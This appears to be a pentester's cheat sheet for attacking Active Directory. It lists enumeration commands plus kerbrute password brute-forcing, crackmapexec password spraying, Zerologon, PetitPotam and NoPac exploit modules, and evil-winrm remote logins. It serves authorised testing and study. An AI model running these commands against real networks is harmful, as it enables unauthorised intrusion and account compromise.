AD Enumeration
Port scanning
nmap -A -p- -T3 --open -vvv -Pn <IP> -oN <output_file>
Important ports are 88, 445 and 139.
SMB Enumeration
smbclient //<IP>/interesting-directory -c 'recursive ; ls' - Fast smb directory enumeration
smbmap -H <IP> -U ''"
RPC Enumeration
rpcclient -U '' -N <IP> - Without password
rpcclient -U '' -P '' <IP> - Using a password
enumdomusers - Enumerate all domain users
querygroupmem 0x200 - Enumerate all the admin users of the domain.
queryuser 0x1f4 - Enumerate user information using the rid.
LDAP Enumeration
Using ldapsearch and ldapdomaindump
ldapsearch -H ldap://<IP> -x -s base namingcontext
ldapsearch -H ldap://<IP> -x -s -b 'DC=tld,DC=local' '(objectClass=User)' 'sAMAccountName' | grep sAMAccountname
ldapdomaindump.py -u 'domain.local\user' -p 'password123' <IP>
Kerberos
kerbrute userenum --dc <domain.local> -d <domain> <path-to-user-wordlist>
kerbrute bruteuser --dc <domain-ip> --domain <domain> rockyou.txt sqlservice
Kerberoasting
KerberoastingCrackmapexec
crackmapexec smb targets.txt -u users.txt -p passwords.txt
crackmapexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success
crackmapexec smb 192.168.1.0/24 -u username -p 'password' --pass-pol
crackmapexec smb 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
crackmapexec smb <ip> -u '' -p '' -M zerologo - Zerologon
crackmapexec smb <ip> -u '' -p '' -M petitpotam - petitpotam
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac - NoPac >> You need credentials dor this one.
Evil-Winrm
evil-winrm -i <IP> -u 'user' -p 'password'
Last updated